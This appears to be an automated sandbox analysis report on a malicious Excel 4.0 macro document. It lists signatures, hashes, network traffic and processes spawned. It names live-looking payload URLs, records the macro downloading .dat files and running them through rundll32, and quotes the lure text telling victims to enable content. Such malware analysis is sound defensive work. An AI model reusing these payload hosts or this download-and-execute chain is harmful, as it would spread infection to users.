Analysis Report Complaint-1992179913-02182021.xls

Overview

General Information

Sample Name: Complaint-1992179913-02182021.xls
Analysis ID: 356738
MD5: b2c46df91cfe891f61af65277461b32b
SHA1: fd329e179663a40c31f5c567228a59349928a6a5
SHA256: 3b9790a911cff3e1572608f3cc377a3776c63014c4230eebc46b0a220f22b1f5
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://pathinanchilearthmovers.com/eznwcdhx/44250666589120400000.dat Avira URL Cloud: Label: malware

Compliance:

barindex
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.3:49722 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Section loaded: unknown origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe Jump to behavior
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: rzminc.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49722 -> 138.36.237.100:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49717 -> 72.52.227.180:80

Networking:

barindex
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.241.80.6 162.241.80.6
Source: Joe Sandbox View IP Address: 138.36.237.100 138.36.237.100
Source: Joe Sandbox View IP Address: 91.199.212.52 91.199.212.52
Source: Joe Sandbox View IP Address: 91.199.212.52 91.199.212.52
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /xklyulyijvn/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /eznwcdhx/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pathinanchilearthmovers.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xjzpfwc/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jugueterialatorre.com.arConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fdzgprclatqo/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xklyulyijvn/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /eznwcdhx/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pathinanchilearthmovers.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xjzpfwc/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jugueterialatorre.com.arConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /SectigoRSADomainValidationSecureServerCA.crt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: crt.sectigo.com
Source: global traffic HTTP traffic detected: GET /fdzgprclatqo/44250666589120400000.dat HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: rzminc.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: rzminc.com
Source: 30D802E0E248FEE17AAF4A62594CC75A.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.cortana.ai
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.office.net
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.onedrive.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://augloop.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cdn.entity.
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cortana.ai
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cortana.ai/api
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://cr.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://directory.services.
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://graph.windows.net
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://graph.windows.net/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://login.windows.local
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://management.azure.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://management.azure.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://messaging.office.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://ncus-000.contentsync.
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://ncus-000.pagecontentsync.
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://officeapps.live.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://onedrive.live.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://onedrive.live.com/embed?
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://outlook.office.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://settings.outlook.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://tasks.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://templatelogging.office.com/client/log
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://wus2-000.contentsync.
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://wus2-000.pagecontentsync.
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 3A40564D-B724-4EFB-A118-96220352F3F1.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown HTTPS traffic detected: 138.36.237.100:443 -> 192.168.2.3:49722 version: TLS 1.2

System Summary:

barindex
Found malicious Excel 4.0 Macro
Source: Complaint-1992179913-02182021.xls Initial sample: urlmon
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 8 Screenshot OCR: Enable Editing, please clic x 14_ from the yellow bar above ok 15 DFR,hdfgr4 16 I : I \.Oj Th
Source: Screenshot number: 12 Screenshot OCR: Enable Editing, please click The specified module could not befound. 14_ from the yellow bar above
Source: Screenshot number: 16 Screenshot OCR: Enable Editing, please click Enable Content 14_ from the yellow bar above 15 O G) 16 17 ,, WHY
Source: Screenshot number: 16 Screenshot OCR: Enable Content 14_ from the yellow bar above 15 O G) 16 17 ,, WHY I CANNOT OPEN THIS DOCUMENT?
Source: Document image extraction number: 2 Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8 Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8 Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? m You are using IDS or And
Found Excel 4.0 Macro with suspicious formulas
Source: Complaint-1992179913-02182021.xls Initial sample: EXEC
Document contains embedded VBA macros
Source: Complaint-1992179913-02182021.xls OLE indicator, VBA macros: true
Yara signature match
Source: Complaint-1992179913-02182021.xls, type: SAMPLE Matched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
Source: classification engine Classification label: mal84.expl.evad.winXLS@11/8@4/4
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{73D35F6B-8852-48AC-A0E2-76CBC5DD0E5B} - OProcSessId.dat Jump to behavior
Source: Complaint-1992179913-02182021.xls OLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr1,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr2,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr3,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr4,DllRegisterServer
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\JDFR.hdfgr,DllRegisterServer Jump to behavior
